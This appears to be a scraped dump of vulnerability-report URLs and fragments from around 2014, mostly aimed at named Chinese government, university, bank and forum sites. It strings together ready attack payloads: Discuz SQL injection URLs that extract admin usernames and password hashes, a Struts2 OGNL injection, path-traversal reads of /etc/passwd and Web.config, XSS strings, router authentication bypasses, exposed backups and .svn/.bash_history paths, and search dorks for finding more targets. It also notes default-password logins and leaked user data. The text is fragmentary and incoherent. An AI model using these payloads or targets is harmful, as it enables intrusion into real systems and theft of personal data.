http://ssp.tjrac.edu.cn/TJRAC/downloadCompetition.action http://editor.tudou.com/_sysadmin/program/ag_examine/iteminfo_check.php http://www.jdxb.cn/oa/pdfdow.aspx?Type=pdf&FileName=../../Web.config inurl:/oa/pdfdow.aspx?Type=pdf http://www.sgzx.fx.edu.sh.cn:80/ www.sgzx.fx.edu.sh.cn http://地址:8080/param.file.tgz http://112.93.42.26:8080/param.file.tgz http://jtamis.moc.gov.cn:8091/statisticchart0.asp?uc=200 http://hudong.moc.gov.cn:2517/advice/listAdvice.jsp?topicID=2 http://www.upforum.org/current.php?id=320 http://www.upforum.org/admin/login.php database:nusp1g1_db http://202.97.136.46:8088/ http://202.97.136.46:8088/cnms/admin.aspx http://job.tianji.com/career/candidate/resume/index http://club.suning.com/forum.php http://zs.snut.edu.cn/AudaZSH/Main/List.aspx?TypeID=09 http://emp.caac.net/Caacjy/List.aspx?typeID=10 http://219.244.0.13/yauEmpWeb/main/list.aspx?ID=01&Flag=%E6%96%B0%E9%97%BB%E5%85%AC%E5%91%8A http://219.244.0.28/studYAU/project6/List.aspx?typeID=31 http://xsc.caac.net/StudOnly/Project6/List.aspx?typeID=31 http://game.pipi.cn/initPay.action?game_id=8 http://www.t3.com.cn/member/packageDetail/packageId/3210703866875 http://地址:1080/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd http://地址:1080/bsc_wlan.php?NO_NEED_AUTH=1&AUTH_GROUP=0 http://地址:1080/st_device.php?NO_NEED_AUTH=1&AUTH_GROUP=0 http://61.144.106.232:1080/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd http://pay.xiaojukeji.com/activity/hongbao/r_redpacket/r_get_strive_list?listid= http://www.szmtaqsczrjdw.gov.cn/webPages/newsPage/InfoListRight.aspx?ParentId=Type001001012 http://www.xzsajd.gov.cn/Web/webPages/newsPage/InfoListRight.aspx?ParentId=Type001001012 http://dflz.jccftxw.cn//newsPage/InfoListRight.aspx?ParentId= http://www.lfspaq.gov.cn/webPages/newsPage/InfoListRight.aspx?ParentId=Type001001012 http://www.99jianzhu.com/down.php?file=%2Fuploads%2Fsoft%2F20130922%2FdRgzIdtL2AkjR60.doc http://go108.astro.women.sohu.com/wish_tree_wished.php?id=15551 http://www.szrtc.cn/ http://www.szrtc.cn/Home/Register http://alumni.sjp.buaa.edu.cn/image.asp http://archives.buaa.edu.cn/htmleditor/ http://archives.buaa.edu.cn/showContent.aspx?columnID=a012f24a-025c-4411-87d6-43a695413720&recID=579&tabName=column_47 http://artgallery.buaa.edu.cn/Rules/List.aspx?id=173 http://bhfx.buaa.edu.cn/index.php?menuid=38&artid=1251&option=com_content&module=24&sortid= http://cgtg.buaa.edu.cn/link/.svn/entries http://fld.buaa.edu.cn/Interedu/List.aspx?id=262 http://fxy.buaa.edu.cn/dispnews.php?newsid=1835&pmenuid=90 http://hq.buaa.edu.cn/cmsfront/cmsQueryAction.do http://kf.buaa.edu.cn/doLogin.do http://math2.buaa.edu.cn/.bash_history http://math2.buaa.edu.cn/.ssh/known_hosts http://math2.buaa.edu.cn/.viminfo http://py.youth.buaa.edu.cn/user/login.action http://sae.buaa.edu.cn/News/List.aspx?id=211 http://sq.buaa.edu.cn/cmsfront/guestbook_doAddGuestBook.do http://transportation.buaa.edu.cn/Research/list.aspx?id=129 http://tyb.buaa.edu.cn/Mass/workcontent.php?page=1&id=99 http://www.me.buaa.edu.cn/index.php?moduleid=m2041_news&articleid=10&categoryid=120&m2041_articleid=10%27 http://www.me.buaa.edu.cn/modules/m2001_news/download_file.php?filename=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd http://yey.buaa.edu.cn/cmsfront/cmsQueryAction.do http://yuanhang.buaa.edu.cn/studentinfo.aspx?m=20130813115132977135&n=20130813120716290150 http://124.205.18.174:7001/manager/status http://www.crbcint.com/lqcms/net/Issueinfo.action?infoId=8a8db38d46745003014684ed6a720007&column=8a8d83831e4f7064011e5c4dcb3a0f32&version=3&channel=1 http://manager.17k.com/站配置不当获取数据库密码 http://manager.17k.com/WEB-INF/applicationContext-slave.xml http://118.244.193.247:28017/ http://114.255.218.226:8080/Content/css/login.css/a.php https://114.255.218.252/css/index.css/a.php http://211.147.211.94:8083/Styles/Default/main.css/a.php https://sdyp.bnu.edu.cn/css/index.css/a.php http://219.142.121.10:8081/login.do http://219.142.121.10:8081/reg/create.do http://219.142.121.10:8088/jiaowu.rar http://irs.bnu.edu.cn/wwwroot.rar http://219.142.121.10:8088/announceboard.asp?AnnounceId=61 http://sss.bnu.edu.cn/morenews.php?id=1 http://219.224.18.165:81/ http://cws.bnu.edu.cn/showPic.jsp?id=100 http://env.bnu.edu.cn/view.php?id=1120 http://geogother.bnu.edu.cn/jsjz/ http://scett.bnu.edu.cn/Channel.aspx?first=dangjian http://pdn.cea.bnu.edu.cn/cmaClassAction.fo?classhot=0&method=classHotView http://www.scett.bnu.edu.cn/Channel.aspx?first=ditu http://wx.bnu.edu.cn/C24H/ViewShow?Serial=008e9a2a-4b53-48fe-af29-a35a010d260c http://xsc.bnu.edu.cn/xsc1/show.php?item_id=2148&accessory= http://as.baidu.com/a/item?docid=4185242 http://as.baidu.com/a/item?docid=3705682 http://192.168.10.70/BEES_V3.4_R_20140421/admin/admin_template.php?nav=list_tpl&admin_p_nav=tpl width:10% text-align:center width:10% text-align:center width:10% text-align:center width:100% height:500px font-size:12px http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> http://www.w3.org/1999/xhtml"><head> http://222.73.2.20:8080/main/login.aspx http://118.145.19.72/product_list.php?cat=3 http://www.xf-express.com.cn/ http://www.xf-express.com.cn/web.rar http://temai.baidu.com/Index/index?qid=1404205496416644&tn=more&zt=more&pvid=1404205521151109&from=searchinput&wd=aaa%22/onmouseover=%22alert%28document.cookie%29&bid=0&cid=0&from=searchinput http://gitlab.hiwemeet.com:28017/ http://地址/rom-0 http://60.179.182.191/rom-0 inurl:viewOrder.action?ordersId= http://www.wangpiao.com/CardInfo/dh/ Author:Tea Date:2014/05/21 http://60.28.43.83:8000/gaokaochafen/ http://60.28.43.83:8000/gaokaochafen/index.jsp http://地址/status_dev_info_t.gch http://地址/manager_dev_config_t.gch http://地址/wlan_security.gch http://地址/manager_log_conf_t.gch http://60.186.188.76/status_dev_info_t.gch http://www.hengan.com/dl_pdf.php?u=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd http://purenetworks.com/HNAP1/GetWanSettings http://112.4.19.17/egbi/channelLogin.do?param=B490539B343D32528C9B8C694F58029D85FCCE9E98E552338C19EEAA7806AE66E88A545AB474BF80EB47CF605528B400888C6DA16B09FFD1 http://xgui.sdo.com/news/ListNews.aspx?channel=21&page=2 php:68行 http://218.108.130.11:8888/yun/watonecloud/cloud!forwardOrderPage.do?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29 http://intranet.super8.com.cn/classes.asp http://intranet.super8.com.cn/Module_Manage.asp http://intranet.super8.com.cn/Hr.asp http://intranet.super8.com.cn/documents.asp http://intranet.super8.com.cn/Teachers.asp http://intranet.super8.com.cn/inc/upfile.htm http://long.zhuoyou.com/bbs/robots.txt%00.php http://long.zhuoyou.com/bbs/uc_server http://css.wangjiu.com/ http://css.wangjiu.com//WEB-INF/web.xml http://java.sun.com/xml/ns/j2ee xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd classpath:freemarker-methods.xml http://css.wangjiu.com/login.jsp http://online.wangjiu.com/login.action http://www.ttyoa.com/OA/DemoPro/MainFrame.jsp?nCurPage=1&OrderBy=ID&IfDesc=desc&MingCheng=asdada&Link=aaa http://www.ttyoa.com/OA/DemoPro/MainPrint.jsp?OrderBy=ID&IfDesc=%20desc%20&iNum=7&MingCheng=&Link= http://www.ttyoa.com/OA/SysManage/JueSe_S/Save.jsp?PAGE=1&OrderBy=ID&IfDesc=asc http://www.ttyoa.com/OA/SysManage/JueSe_H/Save.jsp?PAGE=1&OrderBy=ID&IfDesc=asc http://www.ttyoa.com/OA/SysManage/DeskTop/Save.jsp?PAGE=1&OrderBy=ID&IfDesc=asc http://110.249.253.234/后,在中间位置有个人公积金账户查询的模块。输入身份证号及姓名后,使用默认的初始密码000000即可顺利登录个人管理页面。在密码修改模块修改一个密码之后,就可以查新该用户的公积金剩余情况。 http://house.xizi.com/index.php?m=agent&c=outlet&a=outlet_sale&aid=23 http://buy.xizi.com/index.php?m=gift&c=index&a=ajax_get_day_stock&pid=10330&sid=4331 http://hm.xizi.com/?m=government&c=shops&a=show&sid=652&id=1711 http://yiliao.hupan.com/api/wxuser/nameCard.json?userId=登陆的账号&token=登陆账号的token&username=手机号或账号 http://wxapi.taobao.com/api/wxuser/nameCard.json?userId=登陆的账号&token=登陆账号的token&username=手机号或账号 http://www.mzwater.gov.cn/ShowArtitle.aspx?id=3909 http://demo.huijumall.com/ http://demo.huijumall.com/uploadfiles/20140702105750080.asp http://wooyun.org/bugs/wooyun-2014-058538 http://demo.zzcms.net/uploadimg_form.php?noshuiyin=1 http://demo.zzcms.net/admindoes.txt http://qtnews.zjol.com.cn/ydt/storelist_1.asp http://qtnews.zjol.com.cn http://www.e-tiller.com/ch/index.aspx http://best.alljournals.cn/zgnxtb/ch/index.aspx http://study.21cnedu.com/HtmlWeb/110000/4903/index.html www.wwfchina.org/publication.php?programme=2 http://www.tobaccobid.com/admin/login.jsp http://www.bosideng.cn/Home/P?k=123 http://gov.ishang.net/case/custom.html http://ftpf.ft.gov.cn/News.asp?classid=78 http://fzg.tonghua.gov.cn/pinglun3_alldis.php?yitiid=21 http://jsj.pinghu.gov.cn/SpecialPage/index.aspx?url_pid=174&cateid=360 http://sclz.lss.gov.cn/template/default/newslist.jsp?classId=8a22804434c19b5f0134d0bdb4b0002a http://www.ahshiliang.gov.cn/info.php?left=1&cat_pid=67 http://www.bhzb.gov.cn/q_flfw.asp?lm_id=1023 http://www.bjhrjjjc.gov.cn/group2.php?GroupID=1723 http://www.bzsly.gov.cn/brow.asp?classid=4 http://www.cxqi.gov.cn/E_ReadOpinion.asp?OpinionID=763 http://www.cygsj.gov.cn/sub2_BGXZ.aspx?id=4 http://www.grjcy.gov.cn/more.aspx?sid=0107 http://www.gybxy.gov.cn/gyfwcla.asp?id=10 http://www.gzgb.gov.cn/Article/?Type=18 http://www.heishan.gov.cn/hsxwsp/index.asp?id=1717 http://www.hygz.gov.cn/news/bgshow.asp?id=83 http://www.jintai.gov.cn/about_view.aspx?id=1651 http://www.jzkfqsafety.gov.cn/kf/msg.asp?id=33 http://www.lishan.gov.cn/aspx/online.aspx?onlineID=4 http://www.lwgajj.gov.cn/news_view.asp?newsid=216 http://www.lyjd.gov.cn/view.asp?id=1535&cid=244 http://www.nmgsports.gov.cn/search.jsp?title_content=all&keyword= http://www.shaoshanxiang.gov.cn/class.asp?id=296&classId=295 http://www.shuikou.gov.cn/news.php?id=950 http://www.sxth.gov.cn/sxyx/changhang.aspx?id=19339 http://www.szzjrmfy.gov.cn/news.php?typeid=159 http://www.tzhymz.gov.cn/getlist.asp?pmid=101&fmid=102 http://www.xjjw.gov.cn/News.asp?Bigid=30 http://www.yclynk.gov.cn/newsview.asp?id=158 http://zx.pinghu.gov.cn/ucms/cms/webapp/column.jsp?ColumnID=1342 php:102行 www.chinacreator.com inurl:comm_front/jbft/guestInfo.jsp?id inurl:web/doc_hit.jsp?documentid inurl:cms/docCount/doc_hit.jsp?documentid http://www.hnagri.gov.cn/comm_front/jbft_zf/guestInfo.jsp?id=25&interview_id=38 http://www.zixing.gov.cn/comm_front/jbft/guestInfo.jsp?id=16&interview_id=18【资兴市人民政府】 http://www.yxx.gov.cn/comm_front/jbft/guestInfo.jsp?id=3&interview_id=2【永兴县人民政府 】 http://www.rc.gov.cn/comm_front/jbft/guestInfo.jsp?id=8&interview_id=38【汝城县人民政府】 http://www.nxcity.gov.cn/comm_front/jbft/guestInfo.jsp?id=20&interview_id=17【宁乡县人民政府 http://www.cetz.gov.cn/comm_front/jbft/guestInfo.jsp?id=25&interview_id=32【国家级长沙经济技术开发区】 http://www.yuanjiang.gov.cn/comm_front/jbft/guestInfo.jsp?id=32&interview_id=35【沅江市人民政府】 http://www.nxgov.com/comm_front/jbft/guestInfo.jsp?id=40&interview_id=52【宁乡县人民政府】 http://www.czlwga.gov.cn:88/comm_front/jbft/guestInfo.jsp?id=22&interview_id=10【临武县公安局】 http://www.hnsx.gov.cn/comm_front/jbft/guestInfo.jsp?id=7&interview_id=10【湖南省郴州市苏仙区门户网站】 http://www.hnyyjg.com/web/doc_hit.jsp?documentid=61501【湖南医药价格网】 http://222.240.131.230/web/doc_hit.jsp?documentid=135888【湖南医药价格网】 http://www.hn408.org/web/doc_hit.jsp?documentid=61501【湖南残疾人就业信息网】 http://www.hunangtzy.com/web/doc_hit.jsp?documentid=61501【湖南省国土资源信息网】 http://www.nxcity.gov.cn/cms/docCount/doc_hit.jsp?documentid=36133【宁乡县人民政府】 http://www.jkqrc.cn/cms/docCount/doc_hit.jsp?documentid=9132【长沙经开区人才网】 http://www.chengbu.gov.cn/cms/docCount/doc_hit.jsp?documentid=2201【中国·城步 http://www.nxgov.com/cms/docCount/doc_hit.jsp?documentid=25023【宁乡县人民政府】 http://www.cetz.gov.cn/cms/docCount/doc_hit.jsp?documentid=1【国家级长沙经济技术开发区】 http://bbs.xt.ztgame.com/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%28select%201%20from%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,0x3a,%28select%28select%28SELECT%20concat%28username,0x3a,password%29FROM%20cdb_members%20limit%200,1%29%29from%20information_schema.tables%20limit%200,1%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1%23 http://bbs.xt2.ztgame.com/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%28select%201%20from%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,0x3a,%28select%28select%28SELECT%20concat%28username,0x3a,password%29FROM%20cdb_members%20limit%200,1%29%29from%20information_schema.tables%20limit%200,1%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1%23 http://bbs.qingcheng.com/vhome.php?mod=search http://www.investhuadu.gov.cn/topic.php?channelID=1&topicID=1 http://www.cn-passion.com/ http://ahtkb.hfut.edu.cn/ahtkb/do.php?ac=query&step=1 http://www.allcom.cn/app/asp/show.asp?id=3935 http://591up.com/views/main/default.aspx?sign= http://www.shanghailaw.gov.cn/portal/reviewpdf/pdfdetails.jsp?pfid=2013315 http://gamebbs.pps.tv//faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%28select%201%20from%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,0x3a,%28select%28select%28SELECT%20concat%28username,0x3a,password%29FROM%20cdb_members%20limit%200,1%29%29from%20information_schema.tables%20limit%200,1%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1%23 http://bbs.sanguosha.com/forum.php http://bbs.web.kuaiwan.com/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%28select%201%20from%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,0x3a,%28select%28select%28SELECT%20concat%28username,0x3a,password%29FROM%20cdb_members%20limit%200,1%29%29from%20information_schema.tables%20limit%200,1%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1%23 http://ky.ahedu.gov.cn/ http://ky.ahedu.gov.cn/more.asp?nClass_Id=2 http://bbs.aipai.com/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%28select%201%20from%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,0x3a,%28select%28select%28SELECT%20concat%28username,0x3a,password%29FROM%20cdb_members%20limit%200,1%29%29from%20information_schema.tables%20limit%200,1%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1%23 http://mobile.psbc.com/ewpdl_1404207502/ebank/mobile/apad/psbcpad.apk http://mobile.psbc.com/ewpdl_1404207263/ebank/mobile/android/android2.0/psbc.apk http://mobile.psbc.com/ewpdl_1404207321/ebank/mobile/android_j/psbc.apk http://www.cebbank.com/static/s_upload/201308/123387655/app/yaoyaojiaofei.apk http://3g.cib.com.cn/userfiles/image/cli/CIBV2.1.1.apk http://mbank.srcb.com/mobile/android/bank_srcb.apk http://www.qdccb.com/survey/cnt_down.jsp?/fwzf/xzzx/rjxz/new/BQDAndroidNfc.apk http://www.qdccb.com/survey/cnt_down.jsp?/fwzf/xzzx/rjxz/new/BQDAndroidBank.apk http://wap.qlbchina.com/ebank/mobile/androidpad/android2.1/QLBChina_pad.apk http://wap.qlbchina.com/ebank/mobile/android/android2.1/QLBChina.apk http://download.95526.mobi/sendMessage/downLoadFile/android/android1.5/bob.apk http://www.bocomgroup.com/tw/securities-futures/products-mobile.html http://wap.95559.com.cn/download/client/androidPad/lpc.apk http://wap.95559.com.cn/download/client/android_2g/jtyh2g.apk http://download.hxb.com.cn/mobile/androidpad/HXB_AP_1.3.0.apk http://download.hxb.com.cn/mobile/android/HXB_AM_1.3.0.apk http://www.egbank.com.cn/upload/tools/Androidegb2.apk http://www.hebbank.com/specialimg/zfb/bhb.apk http://app.lenovo.com/app/11394910.html http://wap.95559.com.cn/download/client/android_2g/jtyh2g.apk http://www.cgbchina.com.cn/Info/CMS5_G20306002Resource?info=12584404;res=1401854296884909191424;download= https://play.google.com/store/apps/details?id=com.bankcomm.university http://www.cebbank.com/static/s_upload/201201/71742264/app/ceb_prod_withmap.apk http://apk.gfan.com//Product/App299042.html http://www.mogustore.com/app_show_4620.html http://app.taobao.com/software/detail.htm?appId=396876 http://www.appchina.com/app/com.book.reader/ http://www.nduoa.com/apk/detail/28720 http://app.sogou.com/detail/62219 http://地址:8080/cgi-bin/saveconf http://222.90.29.144:8080/cgi-bin/saveconf http://gamebbs.pipi.cn/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%28select%201%20from%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,0x3a,%28select%28select%28SELECT%20concat%28username,0x3a,password%29FROM%20cdb_members%20limit%200,1%29%29from%20information_schema.tables%20limit%200,1%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1%23 http://bbs.txwy.tw/faq.php?action=grouppermission&gids[99]=&gids[100][0]= http://developer.lenovomm.com/bbs/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28version%28%29,floor%28rand%280%29*2%29%29x%20from%20information_schema%20.tables%20group%20by%20x%29a%29%23 http://221.179.6.170:10080/moawap/view/wapMpp/login.action http://221.179.6.170:10080/moa/guige.jsp http://221.179.6.170:10080/moa/css.jsp http://221.179.6.170:10080/moa/ma3.jsp jdbc:oracle:thin:@192.168.1.107:1521:mmdb http://221.179.6.170:10080/tour2)的数据库,可连接 jdbc:oracle:thin:@192.168.1.107:1521:mmdb http://bbs.pl.sdo.com http://bbs.fy.sdo.com http://bbs.gui.sdo.com http://bbs.kk.sdo.com/ http://bbs.xk.sdo.com site:sdo.com inurl:faq.php http://www.xx5.com/bbs/index.php http://govbbs.dbw.cn/bbs/ http://www.hongkongbmw.com/hotel/?id=261 http://www.hongkongbmw.com/hotel/hongkonghotels.asp?area=23 http://bbs.xywy.com/ http://caifang.china.com.cn/ http://bbs.artphoto.people.com.cn/ http://forum.ftxgame.com/ http://xtmc.oritop.com/shixi/admin/ http://www.xtzyyy.com/admin/ http://www.xtguke.com/admin/ http://www.eyehospital.com/admin/ http://www.xtsz.com.cn/admin/ http://www.xtast.org/admin/ http://jingniugqt.com/admin/ http://www.eyehospital.com/About.php?id=4 http://map.sogou.com/bbs/faq.php?action=grouppermission http://bbs.web.teeqee.com http://kindeditor.googlecode.com/files/kindeditor-4.1.10.zip http://pan.baidu.com/s/1eQ***G6 http://td.kuwan8.com/NewsList.aspx?id=697201049870 http://club.zzty.gov.cn/bbs/ http://bbs.lcldl.gov.cn/ http://www.csp.gov.cn/bbs/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28username,0x3a,password,0x3a,salt%29%20from%20uc_members%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23 http://www.taobao.com/go/act/sale/tbkelite_mainchannel1.php?callback=alert%281%29 http://115.182.51.172/ http://115.182.51.172/showRoleList http://115.182.51.172/showInfo http://viewugc.17k.com/viewugc/vu_toInsetViewPage.action?insetId=8694#5_8694 http://ask.lenovomobile.com https://ebank.cbhb.com.cn/webappservice/TP050102.do?FileName=../../../../../../../../../../../../../../../../../../../etc/passwd http://3g.tv189.com/portal/480/home/wdfw.tar.gz http://3g.tv189.com/portal/wap/home/wdfw.tar.gz http://3g.tv189.com/portal/480/480.tar.gz http://m.ccg.tv189.com/portal/wap/home/wdfw.tar.gz http://jk.tv189.com/admin http://law.tv189.com//struts/webconsole.html bt:/pentest/enumeration/dns/dnsenum# VERSION:1.2 http://wooyun.org/bugs/wooyun-2014-059142 http://sc.wo.com.cn http://sc.wo.com.cn/qidian/Admin/public/login/ http://211.157.166.19:8003/svn/server/ http://www.xiao5u.com/ http://www.xiao5u.com/Demo/School/search.asp www.xiao5u.com http://lovehuge.freebbs.com.tw/ http://www.zybh.gov.cn/ http://www3.zybh.gov.cn/ http://bbs.xmhouse.com/faq.php?action=faq&id=7 http://www.jee-soft.cn/htsite/index.html http://www.jee-soft.cn/htsite/html/cpjfw/cpzx/2012/06/12/1339484245731.html http://office.jee-soft.cn:8080/index.jsp http://oa.jee-soft.cn:8080/index.jsp http://www.jee-soft.cn/htsite/page/platformProduct/getProductList.ht http://office.jee-soft.cn:8080/jasper-upload http://www.xaks.com.cn/showlist.html?sortid=08 https://www.cmpay.com/info/v3/wxzf/wbosver/index.html点击下载,用burp拦截,把verid=000141007878155b0修改成任意喜欢的数字字母,比如verid=iloveyou~~ http://www.ky-express.com/News/ShowNews.aspx?article=800 http://115.182.63.25/ http://115.182.63.25/config.inc http://www.csp.gov.cn/bbs http://e-learning.lenovo.com.cn/forum/faq.php nx.bbn.com.cn/lgy_nzdj/index2.php?member_id=19399&ID=21 http://author.zjol.com.cn/jeecms/LoginAloneInput.jspx http://www.tudou.com/programs/view/MXoDunSp3XY/ http://index.tudou.com/mydata/videolist/t http://index.youku.com/vr_show/showid_vMXoDunSp3XY?type=tudou http://mall.cmbchina.com/Product/S12-501-058-02_081.htm http://www.siwe.com.cn/anonymous/home/indexHome.action http://webgame.553.com/member/find www.553.com url:http://nb.gfan.com/ http://nb.gfan.com http://地址:1080/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd http://地址:1080/bsc_wlan.php?NO_NEED_AUTH=1&AUTH_GROUP=0 http://地址:1080/st_device.php?NO_NEED_AUTH=1&AUTH_GROUP=0 http://oa.sxpmg.com/defaultroot/sp/login.jsp http://oa.sxpmg.com//defaultroot/sp/desktop.jsp?isLogin=1 http://sqlmap.org http://www.teatree.cn/,又名茶树网,涉及到的两个网站:一个是www.teatreexy.com这个是在线教育网站(茶树网学院),另一个是www.teatree.cn,这是个中国电信大学生就职服务平台(茶树网)。 http://www.teatree.cn/register_success.aspx?LoginName=1。 www.teatree.cn,但是进行服务器以后,也看到了www.teatreexy.com的站~~,下面把过程和证据拿出来: www.teatree.cn中就有4600+多个大学,很多都是解放军什么什么大学学院什么的,这里就不贴出来了,我害怕兵哥哥,www.teatree.cn站的uerinfo一个表中就有34W多的用户信息,姓名,用户名,密码,邮箱,电话等,还有很多很多企业的信息,看图 http://www.ec.ccoo.cn/nopwd.asp http://60.195.248.83/mail/send.asp?toMail=frankpraha@hotmail.com&content=%C4%FA%D4%DA%B3%C7%CA%D0%CD%A8%B8%F6%C8%CB%B0%E6%D6%D0%B5%C4%B5%C7%C2%BD%D0%C5%CF%A2:%3CBr%3E%B5%C7%C2%BD%D5%CA%BA%C5%A3%BAqqid5053505%3CBr%3E%B5%C7%C2%BD%C3%DC%C2%EB%A3%BA319091%3CBr%3E&title=%C4%FA%D4%DA%B3%C7%CA%D0%CD%A8%B8%F6%C8%CB%B0%E6%D6%D0%B5%C4%B5%C7%C2%BD%D0%C5%CF%A2&webhref=http://www.ec.ccoo.cn/nopwdsave2.asp?uname=qqid5053505 http://demo.oa8000.com http://tieba.baidu.com/p/3142031881 http://pan.baidu.com/mbox/homepage#share/type=session http://app.qiushibaike.com/的mongodb数据库存在未授权访问,未对数据库设置密码,任何人都能访问,并查看信息 http://wooyun.org/bugs/wooyun-2010-058322,那个../cargo/udn.aspx的马已经被删了,尝试了一下下载网站备份压缩包,发现还是可以下载的 data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4= http://15270227547.blog.sohu.com/304058734.html http://www.baidu.com data:text/html;base64,PGlmcmFtZSBzcmM9aHR0cDovL3d3dy5iYWlkdS5jb20gd2lkdGg9ODAwIGhlaWdodD04MDA+PC9pZnJhbWU+ http://15270227547.blog.sohu.com/304072155.html http://act.blog.sohu.com/plus/impeach.jsp?rp=aaa http://act.blog.sohu.com/plus/impeach.jsp?rp= http://xxxxxx http://act.blog.sohu.com/plus/impeach.jsp?rp= http://xxxxxx data:text/html;base64,语句…… http://15270227547.blog.sohu.com/304072236.html VERSION:1.2 http://地址:8080/cliget.cgi?cmd=$sys_model%;$hw_cver%;$sw_ver% http://地址:8080/cliget.cgi?cmd=$sys_user1%;$lan_ip%;$lan_msk%;status%20wan_ip%;status%20wan_mask%;status%20wan_gw%;status%20dns1%;status%20dns2% http://62.64.0.209/cliget.cgi?cmd=$sys_user1%;$lan_ip%;$lan_msk%;status%20wan_ip%;status%20wan_mask%;status%20wan_gw%;status%20dns1%;status%20dns2% http://www.hljgh.org/newsview.jsp?newsid=832 url:http://cmdp.ncc.cma.gov.cn/drought/lfrost/station.php?1=1&act=stationList&control=list http://pay.5see.com/Pay/LyPay?gameid=wycq http://share.shop.letv.com/admin.php http://api.m.taobao.com/rest/api2.do?api=mtop.shop.getsellerRate&v=1.0&data={"shopId":"62458045","pageNo":"1","pageSize":"10","rateResult":"1"}&type=jsonp&callback=jsonp4 ID:2154815291 http://jianghu.taobao.com/u/MjE1NDgxNTI5MQ==/front.htm http://my.taobao.com/UvCHbMmgYMFISvQTT http://rate.taobao.com/user-rate-UvCHbMmgYMFISvQTT.htm https://u.m.taobao.com/reg/retrieve_pwd_index.htm?_input_charset=utf-8&sid=c3b6df8b0e7be57c02ae608e6d8e9295&ttid=255200%40taobao_android_4.5.0 ID:2154815291 http://jianghu.taobao.com/u/MjE1NDgxNTI5MQ==/front.htm http://rate.taobao.com/user-rate-UvCHbMmgYMFISvQTT.htm http://card.ztcard.cn/index.php http://card.ztcard.cn/load_userinfo.php http://www.ejingmai.com/user/order/show-352570.html http://www.ejingmai.com/user/order/show-352571.html http://www.ejingmai.com/user/order/show-352572.html http://www.ejingmai.com/user/order/show-352573.html http://www.tacourt.gov.cn/showdetail.jsp?pxh=3&progbh=03&axh=3417 http://www.taishancourt.gov.cn/display.asp?id=298 http://www.taishancourt.gov.cn/admin/login.asp http://www.xtfy.gov.cn/Manage/admin.asp http://www.xtfy.gov.cn/Manage/admin.asp http://purenetworks.com/HNAP1/GetWLanSettings24 http://wooyun.org/bugs/wooyun-2010-045677 http://zone.wooyun.org/content/11096 http://app.client.letv.com/config.inc.php user:c*** user:c*** http://220.181.117.74:80/letv/.svn/entries http://wooyun.org/bugs/wooyun-2010-059172 http://www.sxmz.gov.cn/content/topicdeal.jsp?id=1&action=read http://www.sxycmz.gov.cn/content/topicdeal.jsp?id=1&action=read http://www.jcmzj.gov.cn/content/topicdeal.jsp?id=1&action=read http://www.sxlfmz.gov.cn/content/topicdeal.jsp?id=1&action=read http://www.dtcqmzj.gov.cn/content/topicdeal.jsp?id=1&action=read http://www.sxszmz.gov.cn/content/topicdeal.jsp?id=1&action=read http://www.yqmzj.gov.cn/content/topicdeal.jsp?id=1&action=read http://www.sxfb.gov.cn/content/topicdeal.jsp?id=1&action=read http://sxfb.gov.cn/user/reguser.jsp?id=&step=2&action=new http://v.ntzx.cn/home.php?id=10 http://www.qzetv.net/home.php?id=1 http://data.sports.sohu.com/equipment/goods_list.php?category=1&cat_id_list=7 http://www.uzhe.com/ admin:admin http://purenetworks.com/HNAP1/GetWLanRadioSettings jsp:useBean http://192.168.10.64:9992/e/member/index.aspx?s=1&type=mem_favolst http://book.haedu.cn/book/view.asp?bh=278818 http://210.38.120.140:8080/zplug/ajax_asyn_link.php?url=../opac/search.php http://lib.czmec.cn/opac/zplug/ajax_asyn_link.php?url=../opac/search.php http://lib.stdu.edu.cn/hwweb/zplug/ajax_asyn_link.php?url=../opac/search.php http://210.38.120.140:8080/zplug/ajax_asyn_link.php?url=../../../../../../../../../../boot.ini http://58.16.9.203:8080/gzdd/login.action http://地址:8080/save_configuration.cgi http://dawww.ynnu.edu.cn/plus/login.aspx http://0738wo.com/login.asp http://123.139.154.143/tclc/index.jsp inurl:virtualhall/instance/ 